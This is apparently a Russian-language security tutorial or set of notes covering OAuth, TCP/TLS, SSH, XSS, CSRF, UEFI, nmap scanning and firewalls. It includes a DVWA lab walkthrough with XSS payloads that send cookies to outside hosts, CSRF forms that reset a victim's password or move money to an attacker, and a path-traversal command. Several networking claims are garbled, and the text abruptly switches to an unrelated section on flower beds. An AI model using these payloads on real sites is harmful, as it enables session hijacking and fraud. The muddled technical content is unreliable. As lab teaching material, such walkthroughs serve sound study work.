3. Субъект может выполнять только ограниченный набор программ
4. Нужны логи действий

Или HRU (Harrison, Ruzzo, and Ullman ) — существуют объекты, субъекты и права доступа.

Перейдем в более практическую плоскость. Довольно известный способ авторизации это OAuth 2.0, но он не про аутентификацию. Например, вы играете в игру, и приложению нужно, чтобы вы предоставили ваш список друзей из социальной сети — это случай использования OAuth. Окно браузера открывает форму с сервиса авторизации, делая запрос к пользователю на получение разрешений. Пользователь дает согласие на продолжение авторизации, и сервер отправляет код авторизации на машину клиента. И далее этот код отправляется на сервер. В обратку к клиенту прилетают токены, которые позволяют долго поддерживать связь сервисов. Авторизация OAuth 2.0 PKCE Implicit Grant не считается безопасной. Если вы уже используете OAuth 2.0 и вам понадобилось добавить аутентификацию, то смотрим в сторону OpenID Connect. Также, популярный тип Device authorization Grant — OAuth для IoT. Безопасно? Нет. Не пытайтесь написать свою версию OAuth с нуля, используйте готовые библиотеки. Злоумышленник может применить CSRF как популярный вид атаки, также open redirect позволяет повлиять на URL-адрес запроса. Библиотеки это умеют обрабатывать, а вам придется писать всю логику с нуля.

Перед добавлением OAuth в свой проект надо зарегистрировать приложение, предоставив сайт, логотип, имя приложения, URL для редиректа формата demoapp://redirect. После регистрации вы получите client ID и секрет (если есть сервер). Если сервера нет, то PKCE. Далее первый шаг это авторизация. Пользователь видит попап с запросом на разрешение стороннему приложению подключиться к аккаунту, и после подтверждения идет возврат на оригинальную страницу с URL-адресом типа: https://app.com/cb?code=AUTH_CODE_HERE&state=1234zyx . В общих чертах, так это работает.

Многие сервисы работают по REST API, что принуждает придерживаться определенной архитектуры: например, отказ от сессий в пользу простых запросов-ответов. У REST много плюсов, таких как кэширование, настраиваемость контента, и простой интерфейс. И вопреки частому мнению, REST != HTTP. Все, что REST может отдать, считается ресурсом. В плане авторизации, нужно придерживаться простого правила Fail-Safe Defaults — уровень доступа по умолчанию должен быть denied. Никогда нельзя добавлять какую-либо потенциально важную информацию в URL, особенно логины и пароли. При включенном SSL, личные данные в формате user:password шифруют Base64. Сервер получает логин и пароль, и если все ок, отвечает кодом 200 OK. если не ок, то 401 Unauthorized. Это самая простая авторизация. Более сложная это авторизация на токенах и JWT. При описании REST API в документации, нужны следующие блоки: строка запроса, заголовки, тело сообщения.

Если же авторизация на вашем сервисе будет работать через Facebook, LinkedIn, Twitter, нужно зарегистрировать ваше приложение и получить API-ключ. В итоге, формируется электронная подпись. Вместо отправки в Facebook ваших логина и пароля, отправляется подпись.

За контроль доступа в рамках OS отвечает ACL. Стандартно, существует три различных типа доступа, это: ‘read’, ‘write’ and ‘execute’. И бинарное разрешение на выполнение перечисленных операций: да/нет. Выглядит так:

user::rwx
group::rwx
other::rwx

rwx = 111 в бинарном виде = 7.

В Linux, для управления доступами используется команда chmod. Например, мы хотим предоставить права пользователю owner на чтение и запись, поможет команда chmod 600 mytext.txt. Если не получается, то команда sudo chmod 600 mytext.txt. Также в Linux существует UID, это идентификатор пользователя. UID 0 это root, а UIDs 1–999 зарезервированы для определенных операционных задач (например, службы принтера).

В огромных компаниях предпочитают придерживаться подхода RBAC, когда есть роль человека в компании, и к этой роли привязаны доступы. RBAC придерживается подхода с ролями, т.е. сотруднику может быть назначена роль и администратора, и рядового пользователя.

TCP

На транспортном уровне мы используем протокол TCP, благодаря чему два устройства могут напрямую коммуницировать непрекращающимся потоком данных. Транспортный уровень целиком про доставку пользователю сообщения максимально надежно и экономно, для этого транспортный уровень опирается на сетевой уровень. Эти два уровня очень похожи, но отличаются только тем, что транспортный уровень про устройство пользователя, а сетевой уровень про работу на роутере. Пользователь никак не повлияет на работу роутера, поэтому проблемы сетевого уровня решаются на стороне транспортного уровня. Сеть теряет пакеты? Включаем ретрансимиссию.

Для организации связи TCP применяется 3-х этапное рукопожатие: первым этапом идет TCP SYN-сообщение, которое говорит что я как пользовать хочу открыть коннект. Ответ должен быть TCP SYN AKN, и последнее TCP AKN. В заголовке TCP есть номер порта отправителя и получателя (TSAP), sequence number, AKN, набор флагов. И да, с помощью SYN злоумышленники симулируют TCP/IP коннект и проводят DoS. Sequence number и AKN обмениваются своими значениями исходя из стороны. TCP на первом шаге рукопожатия отправляет client_hello сообщение, с набором параметров: версия, random, ID сессии, список поддерживаемых криптографических алгоритмов. Ответ от сервера servel_hello содержит аналогичные параметры. Рукопожатие лишь один их трех протоколов поверх TLS. HTTP это простое TCP-соединение через порт 80, HTTPS же работает через порт 443, и соединение TLS через TCP. HTTP отвечает за обмен данными между клиентом и сервером, и работает поверх TLS. Второй это CCSP, третий — Alert.

Однако постоянное соединение не бесплатно. Вопрос, который важно задать, — когда закрывать соединение. Соединение с сервером должно оставаться открытым, пока загружается страница. А что потом? Велика вероятность того, что пользователь нажмет на ссылку, которая запросит у сервера другую страницу. Если соединение остается открытым, следующий запрос может быть отправлен немедленно. Однако нет никакой гарантии, что клиент сделает еще один запрос к серверу в ближайшее время. На практике клиенты и серверы обычно держат постоянные соединения открытыми до тех пор, пока они не простаивают в течение короткого времени (например, 60 секунд) или пока у них не появится большое количество открытых соединений и не возникнет необходимость закрыть некоторые из них. Также, можно поддерживать одновременно много TCP-соединений. А насильно «убить» соединение можно с помощью TCPView.

Держим в уме, что защита конфиденциальности и целостности передаваемых данных это не всегда цель установки защищенного канала. Иногда нужна только защита целостности. И создание защищенного канала не обязательно требует использования криптографии. Если канал защищен только на физическом уровне, но невозможно соединение с внешними сетями — коннект уже защищенный.

TCP, как и UDP, работают по концепции портов. Порт это 16-и битный номер от 0 до 65535. Для сервисов используется диапазон от 0 до 1023. Приложения «слушают» определенные порты, так, для SMTP это 25, для DNS это 53, HTTPS = 443. Почти все они используют TCP. Некоторые порты зарезервированы, список можно найти тут. Порты с 1024 до 49151 можно зарегистрировать через IANA, но приложения выбирают порты на свое усмотрение. Например, BitTorrent использует диапазон 6881–6887, но иногда может и другие.

Заголовок TCP это 20 байт, далее идут данные 65,535 – 20 – 20 = 65,495 байт. В минимальном варианте, все устройства обязаны работать с 536 + 20 = 556 байт.

Также есть протокол Heartbeat, который служит для индикации нормального оперирования системы и синхронизации. Для TLS этот протокол был представлен в RFC 6250, и состоит из двух сообщений: heartbeat_request и heartbeat_response, и устанавливается во время первого шага рукопожатия.

SSH. Изначально был сделан как дешевое и безопасное решение для сети, и нормальная замена telnet, работающая поверх TCP в виде трех протоколов. Для коннекта к удаленному хосту используется команда ssh user@192.168.125.51, вас скорее всего попросят принять публичный ключ, нужно ответить yes. Теперь можно вбить команду ls -la для проверки содержимого директории home. Там будет директория .ssh, в которой будет файл known_hosts, благодаря содержимому которой нас ничего не спросят во время повторного коннекта к 192.168.125.51.

Для генерации нового ключа хоста нужны команды:

sudo rm /etc/ssh/ssh_host_*
sudo dpkg-reconfigure openssh-server
sudo systemctl restart ssh

Если теперь вбить команду exit и попробовать заново приконнектиться к http://192.168.125.51/, то в этот раз будет несовпадение ожидаемого и реально имеющегося публичного ключа.

SSH умеет перенаправлять порты, то есть превращать TCP и SSH. Есть два типа перенаправления: локальное и удаленное. Локальное берет часть TCP-трафика и перенаправляет в SSH. Удаленное SSH — клиент начинает вести себя как сервер.

XSS

Атака XSS весьма проста: вставляется JS-код в HTML-документ. Существуют разновидности, например, Reflected XSS. Пример такой атаки https://www.site.ru/search/?text=%3Cscript%3Ewindow.open(%27https://your-scorpion.ru/?cookie=%27%20+%20document.cookie);%3C/script%3E , разумеется, site заблокирует сайт и не допустит выполнения JS-кода. Но потенциально браузер мог открыть новое окно, и переслать куки на сторону злоумышленника. Отсюда и название Reflected.

Другой тип XSS атаки это Stored, при такой атаке вредоносный скрипт всегда расположен на стороне сервера.

Идея понятна, мы добавляем некий код и он становится частью веб-страницы. Противодействие такой атаке это верификация введенных данных в любые текстовые поля. Причем, проверка должна быть не только на фронте, но и на беке: можно вбить в консоль команду document.forms, и через полученную форму рассылать спам.

Также, валидация должна учитывать разное компьютерное представление одинаковых данных. В качестве примера можно привести технику под названием escaping, которая преобразует алфавитные символы в более компьютерные: <script> становится &lt;script&gt; Это решается санитизацией, когда мы избавляемся от всего, кроме простой строки. И CSP для предотвращения XSS, достаточно простого default-src 'self'; script-src 'self'; object-src 'none'; frame-src 'none'; base-uri 'none';.

Важно преобразовывать HTML и JS -символы следующим образом

< converts to: &lt;
> converts to: &gt;

< converts to: \u003c
> converts to: \u003e

Сразу скажу, что такой базовой санитизации кода для реальных проектов не хватит. Server-side HTML санитизация не гарантирует безопасность. Цепочка париснг > сериализация > парсинг упирается в особенности парсинга. Возможен и более низкий уровень преобразования символов, например, число 45 это 101101, так как 45 = 1×32 + 0x16 + 1×8 + 1×4 + 0x2 + 1×1.

Даже слеш / может быть отображен по разному, а ведь это путь к папке ../../../../../etc/passwd/. Если мы хотим записать слеш в 1 байт, мы пишем 0xxx xxxx, в 2 байта 110x xxxx 10xx xxxx, в 3 байта 1110 xxxx 10xx xxxx 10xx xxxx. Это возможно, потому что кодировка UTF-8 для символов юникода (RFC 2279) была определена для использования юникода в системах ASCII. ASCII символы (U0000-U007F) представлены в виде байтов 0x00-0x7F. Прочие символы имеют диапазон 0x80-0xF7. Другими словами, имя может быть написано для прочтения компьютером разными способами. Тот же IP-адрес может быть написан без точек, или имя файла может быть написано с большой буквы. Пример команды для терминала windows, которая через команду ping запустит калькулятор:

cmd.exe /c "ping 8.8.8.8/../../../../../../../../../../../../../windows/system32/calc.exe"

Попробуем провести атаку сами. Разумеется, в тестовом окружении. Первый шаг, который необходимо сделать при выявлении уязвимостей веб-приложений, это понимание базовой функциональности веб-приложений. Что предполагает обнаружение точек ввода данных пользователем и понимание того, как приложение оьрабатывает на ввод данных. Мы будем использовать веб-приложение DVWA из Kali, нужно сделать следующее: запустить Kali, войти в приложение через страницу входа — http://192.168.125.150/login.php. Выберите уровень сложности взлома DVWA как Low.

После перейдите на страницу XSS (Reflected). Веб-страница содержит текстовое поле. Попробуйте вбить любой текст, и увидите, как система вас поприветствует.

Далее мы должны проверить, как обрабатывает приложение инпут от пользователя и как мы можем это использовать в наших некорыстых целях.

Система позволяет нам ознакомиться с кодом. Обратим внимание на строки 6-8, где приложение проверяет, ввел ли пользователь данные. Если данные были введены, приложение отправляет сообщение Hello вместе с введенными пользователем данными тем же способом, каким они были введены. А что, если мы введем <h2>Hi</h2>? Это сработает, и наш текст приобретет визуальные свойства заголовка H2. Это легко подтвердить, зайдя в инспектор браузера.

Пойдем дальше и попробуем выполнить JS-код. Команды <script>alert("XSS")</script> и <script>alert(document.cookie);</script>. Как не трудно догадаться, обе команды сработают:

Более хитрые способы, которые позволяют обойти базовую валидацию, это поиграться с символами, например <scr<script>ipt>alert("XSS")</script> или <Script>alert("XSS")</script>. Либо можно пойти дальше, и завязаться на обработчики событий, такие как onload, onclick, onerror, onload и т.д. Например, мы можем добавить обработчик события onclick к элементу кнопки, чтобы он выполнялся при нажатии на кнопку. Так, мы будем использовать обработчик события onerror с картинкой. Настроим его таким образом, что если при загрузке изображения произойдет ошибка, будет выполнен код javascript в обработчике события onerror. Готовый скрипт может выглядеть следующим образом:

<img src=randomStuff onerror='alert("XSS")'>

Не всегда можно украсть куки жертвы. Если в cookies жертвы установлен флаг httpOnly, вы не сможете получить доступ к cookies жертвы с помощью JavaScript. Флаг httpOnly делает куку невидимой для JS. httpOnly это дополнительный флаг, включаемый в заголовок ответа Set-Cookie HTTP. Использование флага httpOnly при генерации cookie помогает снизить риск получения доступа к защищенному cookie сценариями на стороне клиента. Однако это не означает, что мы не можем выполнять другие действия от имени жертвы. Используя XSS, возможно украсть конфиденциальную информацию, например, банковские операции, электронную почту или медицинские записи, используя учетную запись жертвы. Нам не нужно получать доступ к учетной записи жертвы, мы можем просто создать полезную нагрузку, которая получит эту информацию и отправит ее на наш сервер. Поэтому важно отключать HTTP TRACE.

Куки передаются в заголовке, выглядит это как строка Set-Cookie: id=2bf353246gf3; Secure; HttpOnly. Если кука помечена как Secure, то она передается только по https. Это обеспечивает конфиденциальность и защиту от MiTM, но не гарантирует целостности. Обсужденный выше атрибут HttpOnly обеспечивает только конфиденциальность. Третий атрибут, Path, указывает путь. Также, не забываем про два полезных инструмента для предотвращения XSS: XSS Hunter или XSStrike. Первая для теста на blind XSS, Вторая для поиска уязвимостей XSS.

Если суммировать, то во время нормальной пользовательской сессии, сервер отправляет на клиент cookie с идентификатором сессии, и клиент отправляет session ID обратно серверу. Поэтому, чтобы притвориться пользователем, злоумышленнику нужна cookie. Он может ее перехватить либо в момент обменом данными сервер <-> клиент, с этим успешно борется https. Второй вариант это JS.

В devtools, во вкладке application есть раздел cookies. При выборе куки из списка обращаем внимание на следующие параметры: если не стоит галочка secure, это означает, что кука может передаваться по http. Вторая важная галочка это httponly, если ее нет, значит к куке можно получить доступ через JS. Вы можете вбить JS- команду document.cookie в консоль, и получить доступ к куке, но это не воровство сессии, а просто понимание, что возможна атака XSS на веб-странице. Но, если злоумышленник сможет внедрить в форму веб-страницы код, типа

<script>new Image().src = 'http://another.site/' + encodeURicomponent(document.cookie)</script>

то при отправке формы пользователем, на сервере злоумышленника будут логи с валидным session ID. И злоумышленнику достаточно изменить value в куке со своей на новую из логов. Поэтому контролируйте, чтобы все параметры безопасности в cookie были проставлены.

XSS DOM. Мы опять идем в наш любимый DVWA и выбираем соответствующий пункт меню, предварительно указав уровень сложности = low. Выбранная страница должна содержать выпадающий список, который позволяет пользователям выбрать язык веб-приложения. Доступные варианты — английский, французский, испанский и немецкий. Когда мы выбираем язык и нажимаем кнопку отправить, мы видим, что выбранный вариант появляется в URL-адресе браузера в качестве входного параметра по умолчанию.

По привычке, вставляем <script>alert(document.cookie)</script> и смотрим на результат.

Но это было слишком легко. Переключимся на режим сложности medium, в котором задействован бэкенд. Наш простой способ атаки с использованием тега <script> больше не прокатит. Поскольку мы не можем использовать тег script, мы можем использовать обработчики событий для выполнения нашего кода. Событие onerror можно использовать для выполнения кода JavaScript, если при загрузке изображения произошла ошибка. Нам просто нужно указать HTML-тег img на несуществующее изображение. Этого можно добиться, указав в атрибуте src несуществующее место назначения изображения:

</option></select><img src=x onerror=alert("xss")>
</option></select><img src=x onerror="alert(document.cookie)">

И разберемся с уровнем сложности High: в нем есть следующие особенности. Части запроса оцениваются сервером. Но то, что находится после симвода # не отправляется на сервер.

http://192.168.125.150/vulnerabilities/xss_d/#default=<script>alert(document.cookie)</script>.

Минимизировать такого рода проблемы помогают анализаторы кода. Они бывают двух видов. Статичный анализ это анализ кода или любых других артефактов на уязвимости. Динамический анализ про анализ работы самой программы, процесса ее запуска и выполнения функций. Ключевые моменты: в принципе, одно не лучше другого по своей сути; они служат принципиально разным целям. Статический код хорош для поиска небезопасных функций (например, gets()), мертвого кода (код, который на самом деле никогда не выполняется, но все еще занимает место, поэтому может быть атакован), безопасности памяти, проверки типов (в зависимости от языка, проверки того, что типы ведут себя так, как они должны вести себя), но не может проводить проверку ввода или проверять все типы аргументов функций.

Динамический код может в некоторой степени искать валидацию ввода и проверять аргументы функций, но ценой снижения производительности во время выполнения. Обычно динамический анализ используется во время тестирования разрабатываемого программного обеспечения, а не на проде.

CSRF

В отличие от XSS, который использует доверие пользователя к определенному сайту, CSRF использует доверие сайта к браузеру пользователя. Например, пользователь переходит по вредоносной ссылке и открывает некую страницу с вредоносным кодом, когда он залогинен в онлайн-банкинге. До этого вы посещали сайт своего банка, и банк оставил у вас в браузере cookie. Далее вы посещаете сайт злоумышленника или даже заполняет форму через рекламный баннер, который отправляет в банк запрос через форму обратной связи, используя сохраненную cookie. Либо, злоумышленник может подменить данные для авторизации на свои собственные, и тогда любые действия пользователя станут видны злоумышленнику. Современные браузеры используют SameSite cookies, что нивелирует атаку. Cookies, установленные в браузерах с атрибутом SameSite, неотличимы в HTTP-запросах от cookies без такого атрибута (т.е. атрибут SameSite не указывается в HTTP-запросе).

Для проведения CSRF-атаки требуется выполнения трех условий: действие внутри приложения, которое подкреплено идентификацией на основе кук в браузере, и при этом отсутствуют непредсказуемые параметры в запросе.

По классике, заходим на страничку http://192.168.125.150/login.php и ставим сложность = low. Открываем страницу CSRF. Попытаемся сменить пароль и видим, что он передается прямо в браузерной строке:

В данном случае, приложение полагается исключительно на куки сеанса для отслеживания сеанса. Нам нужно будет создать пустую HTML -страничку, которая будет жить на нашем сервере. Как заманить пользователя на страничку, это уже вопрос социальной инженерии. В самом примитивном варианте, приложение использует метод HTTP GET для изменения пароля, что можно автоматизировать. Это означает, что злоумышленник может воспользоваться этой уязвимостью, отправив жертве URL. http://192.168.125.150/vulnerabilities/csrf/?password_new=attackerPassword&password_conf=attackerPassword&Change=Change. И это изменит пароль автоматически. Но это будет слишком очевидно, пусть жертва сменит пароль самостоятельно. По этой причине не стоит отправлять жертве URL, показанный выше, так как это может вызвать подозрения. Куда лучше использовать внешний сайт для размещения нашего вредоносного HTML-документа. Ниже представлен код для HTML-страницы:

<form action="http://192.168.125.150/vulnerabilities/csrf/?" method="GET">
			<h1>CRSF attack </h1>
			<input type="hidden" AUTOCOMPLETE="off" name="password_new"value="pentester77">
		
			<input type="hidden" AUTOCOMPLETE="off" name="password_conf"value="pentester77">
		
			<input type="submit" value="click me" name="Change">

		</form>

Зайдите через аккаунт жертвы на созданную нами страницу, перейдите по ссылке, и вы увидите, что пароль изменился.

На более сложном уровне, атака CSRF производится с участием Burp Suite.

XS-leaks используют особенности работы браузера, чтобы выявить какую-то информацию об авторе. Например, заходил ли пользователь на фейсбук, и бинарный ответ да или нет. Работает по следующему принципу: после первого захода на фейсбук были закешированы некие файлы для ускорения загрузки. И если запрос выполняется за 500мс, то ресурс брался не из кеша, и значит пользователь не заходил на фейсбук. Это годится для обогащения finger-print. Примеры.

Еще раз, CSRF вынуждает пользователя выполнить действие, которое он не хотел. Эта атака также может называться One-Click attack, XSRF, Sea Surf, Session Riding, Cross-Site Reference Forgery, Hostile Linking. Концепция простая: вы хотите переслать деньги коллеге, а злоумышленник хочет получить эти деньги. Для этого он создает вредоносный URL, и обманом вынуждает вас нажать на вредоносный URL. Скажем, правильный URL был бы GET http://bank.com/transfer.do?acct=VIKTOR&amount=500 HTTP/1.1, а злоумышленник написал адрес http://bank.com/transfer.do?acct=ATTACKER&amount=10000. Злоумышленник отправляет вам эту ссылку по почте, либо внедряет ссылку на страницу, которую вы часто посещаете. Например, <a href="http://bank.com/transfer.do?acct=ATTACKER&amount=10000”>Отправка без комиссии</a>. Либо ссылка на скачивание торрента.

Для POST-запроса, нужна будет форма:

<form action="http://bank.com/transfer.do" method="POST">
<input type="hidden" name="acct" value=“”VIKTOR/>
<input type="hidden" name="amount" value=“50600”/>
<input type="submit" value=“”Check balance/>
</form>

И автоматическая отправка с использованием JS: <body onload="document.forms[0].submit()">.

BIOS/UEFI

BIOS и UEFI — это два разных подхода к начальной прошивке устройства. BIOS старее, чем UEFI, а значит UEFI более гибкий. Также, BIOS не может загружаться с носителя больше 2.1 TB, против 9.4 зеттабайтов для UEFI. Прошивки располагаются на стираемой read-only памяти EEPROM, работают на 32-или 64-bit защищенном режиме на CPU.

Возможности UEFI весьма впечатляют, учитывая примитивность такого софта. Например, возможно удаленное включение компьютера с помощью UEFI. Первая идея это автоматически включать компьютер при подаче питания (в случае отключения электричества). Или, для злоумышленников, автоматически включать компьютер по таймеру (например, рано утром перед началом рабочего дня). Названия опций в UEFI/BIOS отличаются у разных производителей, я не буду приводить примеры. Другая полезная фича, когда мы хотим добавить датчик доступа по отпечатку пальца к существующему устройству. Это возможно, но придется работать напрямую с bios/efi/uefi. Иначе доступ можно обойти, загрузив другую ОС без вашей программы блокировки.

Если была заражена UEFI, то скрытность и сложность обнаружения таких вирусов, а также их стойкость (т.е. они остаются активными в системе даже после ее форматирования) делают эти типы вредоносных программ очень мощными. Любую вредоносную программу, работающую на более низком уровне/кольце, чем механизм защиты, гораздо труднее обнаружить. Поэтому средство обнаружения должно работать как минимум на том же уровне/кольце, что и целевая вредоносная программа, а в идеале — на более низком.

Встроенное ПО (BIOS/UEFI) и операционные режимы (SMM — system management mode) отвечают за последовательность загрузки, управление питанием и обработку ошибок на уровне микросхемы, а также за многие другие задачи. Этот тип микропрограмм и операционных режимов может эффективно работать без ведома ОС и гипервизора. BIOS/UEFI и SMM работают ниже уровня ОС, и когда стартует OS, BIOS/UEFI первым проверяет кол-во памяти и подключенные устройства. Для проверки BIOS используется использование цифровых подписей и безопасной загрузки. Руткиты для SMM зачастую работают путем перезаписи ОЗУ управления системой, части системной памяти, используемой для хранения кода, используемого SMM. SMM обрабатывает системные события, такие как ошибки памяти или чипсета, осуществляет более глубокое управление питанием в спящем режиме, а также эмулирует мышь и клавиатуру PS/2. Однако он не предотвращает выполнение вредоносного кода.

Наличие разных BIOS на рынке это хороший вариант защиты. Хотя фрагментация приводит к дублированию усилий, она также вносит разнообразие в поверхность атаки. Под разнообразием мы подразумеваем, что злоумышленнику будет сложнее добиться успеха в атаке, поскольку при целенаправленной атаке потребуется дополнительная разведывательная и оружейная деятельность, чтобы выяснить, какой именно BIOS нужно взломать, а затем осуществить атаку на него. Но, опять же, за стандартом будет следить гораздо больше людей, чем за любой прошивкой BIOS. Тем не менее, большинство (если не почти все) производителей теперь используют UEFI, которая более стандартизированная.

И в целом очень полезно проверять системы сотрудников командой (Get-PSReadLineOption).HistorySavePath, и далее cat + путь от команды выше. Может уберечь даже от сотрудников-вредителей.

Network mapping

Network mapping (инвентаризация) это решение задачи, когда нам нужно найти все активные устройства в сети. Для этого можно использовать DNS, или reverse DNS. Либо ICMP протокол в роли эхо на броадкаст или узкий диапазон. Broadcasting, multicasting and anycasting: broadcasting означает, что IP-пакет отправляется всем получателям; multicasting подразумевает отправку пакета определенной группе получателей; пакеты anycasting отправляются только в пункты назначения, которые, по решению маршрутизатора, являются ближайшими в сети. Команда nmap для этого: sudo nmap -PE 192.168.125.1/24. Теперь разберемся с деталями:

ICMP это протокол, используемый для дебага сети или поиска ошибок. ICMP можно использовать для «пинга» или обнаружения хостов в сети. Это возможно потому, что ICMP добавляет информацию о состоянии в IP-датаграммы, а RFC 791 утверждает, что стандартным ответом на получение эхо-запроса ICMP является отправка эхо-ответа ICMP. Так подтверждается работоспособность узла. Если вы будете отправлять запросы вручную, то Firewall будет мешать инвентаризировать устройства, и в этот момент нужно переходить на nmap.

По умолчанию nmap отправляет ICMP эхо, ICMP с запросом времени, TCP SYN на порт 443, TCP ACK на порт 80. Команда sudo nmap –sT 192.168.0.1 сделает полное рукопожатие и установит TCP-связь. Другая команда, sudo nmap -sU 192.168.0.1 для проверки открытости или закрытия портов. Если нет ответа — порт закрыт. Разумеется, без таймаутов вы произведете SYN flood атаку. И наоборот, если вы отправляете сообщения об отказе миллионам поддельных соединений, вы можете пострадать от DoS-атаки. ICMP ограничивает это на уровне ядра в Linux. Также, nmap + TCP это хороший способ понять, какие правила настроены на фаерволе. Другая полезная команда nmap -os -db позволяет предположить характеристики ОS. Командой nmap -sn 192.168.125.1/24 вы можете выполнить ping-сканирование всей подсети сети и отобразит список активных хостов.

Если нужно исключить какой-то адрес из сканируемой области, то это делается так: nmap -sn 192.168.125.1/24 --exclude 192.168.125.1. А просканировать целевой адрес можно так: nmap -sn 192.168.125.80 192.168.125.112. Но быстрее и веселее использовать команду nmap -PS 192.168.125.1/24, это полноценный пинг TCP SYN.

Также, команда nmap. -sV попытается узнать сервисы на порте. -sC запустит скрипт на обнаруженные сервисы. -o — выяснить OS, -oA — выдаст результаты по типам файлов. В итоге, команда может выглядеть так sudo nmap -sV -sC -O -oA nmap -www-sitetest-com www.sitetest.com , она позволит получить данные для анализа используемых технологий бекенда.

Многое из описанного выше это Smurf атака на минималках, то есть рассылка огромного кол-ва ICMP-сообщений. Атака Smurf это распределенная атака типа «отказ в обслуживании», при которой большое количество ICMP-пакетов передается по широковещательному IP-адресу назначения и IP-адресу источника, установленному для предполагаемой жертвы. Устройства, получающие такие широковещательные пакеты, отправляют ответ на IP-адрес источника, и если большое количество машин получают и отвечают таким образом, компьютер жертвы будет переполнен трафиком. Так как пинг это ICMP пакет, который некоторые админы блокируют его на своих устройствах, используя межсетевой экран. Любой NGFW такую атаку распознает.

Для блокировки ICMP, используйте следующую команду: iptables -A INPUT -p icmp --icmp-type echo-request -j DROP. Так вы добавите проблем и злоумышленникам, и себе. В любом случае, ICMP не является надежным средством диагностики, ICMP легко отбрасывается из-за перегрузки канала, и много где применяется ICMP Rate Limit для защиты от DDoS. В дополнении и скорее в формате вредных советов, можно отключить и ping: echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all, так можно скрыть свой VPN-сервер от ботов.

Но если все прошло хорошо, можно составить подобную таблицу правил:

В таблице представлена только внутренняя часть сети. Роутер с фаерволом, и внутренняя DMZ с набором хостов. Последнее правило это просто «Отклонять все», оно сработает только если не сработают другие правила выше. Первое правило разрешает все из любого источника до точки назначения во внутренней сети, если протокол TCP и порт должен быть больше, чем 1023. Обычно порты 0-1023 считаются привилегированными портами. Второе правило запрещает любые связи с нашим роутером 192.168.1.1, то есть мы блокируем все, что выдал наш фаервол. Третье правило аналогичное, но запрещает что-то присылать на роутер. Роутер должен быть изолирован от сети, хотя Drop лучше использовать на брандмауэре. Четвертое правило говорит о том, что из внутренней сети мы разрешаем доступ к интернету. Шестое правило позволяет пакетикам летать от любого источника к 192.168.1.3, но только по HTTP.

Это без учета стандартых мер защиты Windows. Использование Credential Guard. Ограничение входа на рабочие станции с высоким уровнем прав. Запрет делегирования полномочий в AD и удаленного доступа. У администраторов нету почтовых ящиков. Lanman удален и пароль изменен, с холодной перезагрузкой.

Если нужно сформировать задокументированную архитектуру кампусной сети и нету никаких наработок, то поможет поиск устройств в сети с помощью протоколов CDP (L2) и LLDP (L2) для обнаружения соседних устройств. CDP — проприетарный протокол канального уровня, по нему можно получить: hostname, remote port ID, system platform, system version, management addresses. Его нужно включать глобально, а потом уже на интерфейсе. Такие протоколы нужно отключать на границах и на конечных пользовательских компьютерах.

SW1(config)#cdp run 
SW1(config-if)#cdp enable 
SW1#show cdp neighbors GigabitEthernet 0/1 detail

Описанный выше Nmap и более быстрая софтинка Zenmap для сканирования сети:

root@ubuntu:/#apt install nmap
root@ubuntu:/# nmap -sn 192.168.230.0/24

nmap -f 10.x.x.x для быстрого сканирования, nmap --script==firewalk 10.x.x.x. Команда nmap -sV --script=banner 10.x.x.x для просмотра версий сервисов.

Данные ARP-адресов и MAC-таблиц. По кол-ву MAC-адресов можно понять, конечное или сетевое устройство находится за портом коммутатора. И производителя по OUI. ARP расскажет про кол-во активных устройств в сети. Также не забывайте про данные из маршрутизации и файлы конфигурации оборудования.

Firewalls

Существует два вида — network и host. Network устанавливает защиту между двумя сетями. Host же живет между сетью и конечным устройством. Брандмауэр (он же firewall) на базе сети действует как шлюз между двумя или более сетями, в то время как брандмауэр на базе хоста реализуется на конкретной конечной точке, для защиты которой он предназначен. Оба типа брандмауэров действуют для фильтрации сетевого трафика. Также, firewall может быть stateless, в этом случае в него записаны правила блокировки или или разрешения определенного трафика. Противоположным stateless является stateful, который привязывается к сессии и принимает решения исходя из ситуации на основе статистики (и не только). Stateful анализирует сетевой трафик на наличие подозрительных признаков и действий и предотвращает их проникновение в сеть.

Firewall смотрит содержимое сетевого пакета, особенно IP-адрес отправителя и назначения, и блокирует трафик, если аналогичный IP-адрес в черном списке. Но IP-адрес можно подменить. По большей части, с помощью Firewall блокируют по IP определенные ресурсы, отсекают часть спама на уровне SMTP, блокируют доступ на основе введенных аутентификационных данных по IPSec, дают доступ к интернету только в рабочее время.

Пакетный фильтр на firewall работает на третьем и четвертом уровне модели OSI, обычно включает себя IP-адреса отправителя и точки назначения, и TCP/UPD номера портов. Например, можно разрешить весь трафик, кроме telnet и SNMP. Либо наоборот, блокирует все, кроме HTTPS, POP3, SMTP, SSH. Но очевидно, что если разрешен трафик на электронную почту, то туда может прийти вирус в обход firewall. Ну и с высокой вероятностью будет оставлен порт 80, и огромное кол-во протоколов смогут туннелироваться через HTTP.

С описанной выше проблемой поможет IDS, в котором есть сенсоры для анализа аномалий и некорректного использования. Сенсорами могут выступать syslogs, firewalls, wireshark. Под аномалиями обычно понимают нетипичное поведение с точки зрения ML, статистики и базы знаний. Включает в себя байесовские сети, модели Маркова, нейронные сети, генетические алгоритмы, кластеризации, выбросы. Выдает три ключевых момента для продолжения работы: место детекта, описание детекта и если может, предлагает кнопочку для реакции на детект. Если IDS умеет еще и предотвращать вторжения, то это IPS, скорее всего попросту заблокирует отправителя или дропнет пакеты. IDS работает пассивно, это значит что работа направлена только на мониторинг. После обнаружения вредоносной активности, это задача администратора успеть предотвратить негативные последствия. Активная защита также реагирует на обнаруженные вторжения. Правильнее смотреть в сторону SIEM, такие как Splunk или Chronicle.

Цветники и озеленение

Цветник это участок с декоративными растениями на сезон или несколько. Когда вы гуляете по городу, то наверняка встречаете красивые летние композиции из цветов. Безусловно, хотелось бы видеть красивые цветы круглый год, но сад непрерывного цветения и малого ухода в полосе Восточной Европы сделать трудно, хоть и возможно. Так как погодные условия везде разные, наша первостепенная задача это понять экологическую ситуацию участка: сухо-солнечно, влажно-солнечно, влажно-полутень, сухо-полутень, тень-влажно. И какая функциональность будет у цветника: на больших площадях при парадных зонах используется партер, т.е. клумбы с приподнятым центром (если более 5 метров), рабатка (грядка), узкий прямоугольник вдоль дорожек.

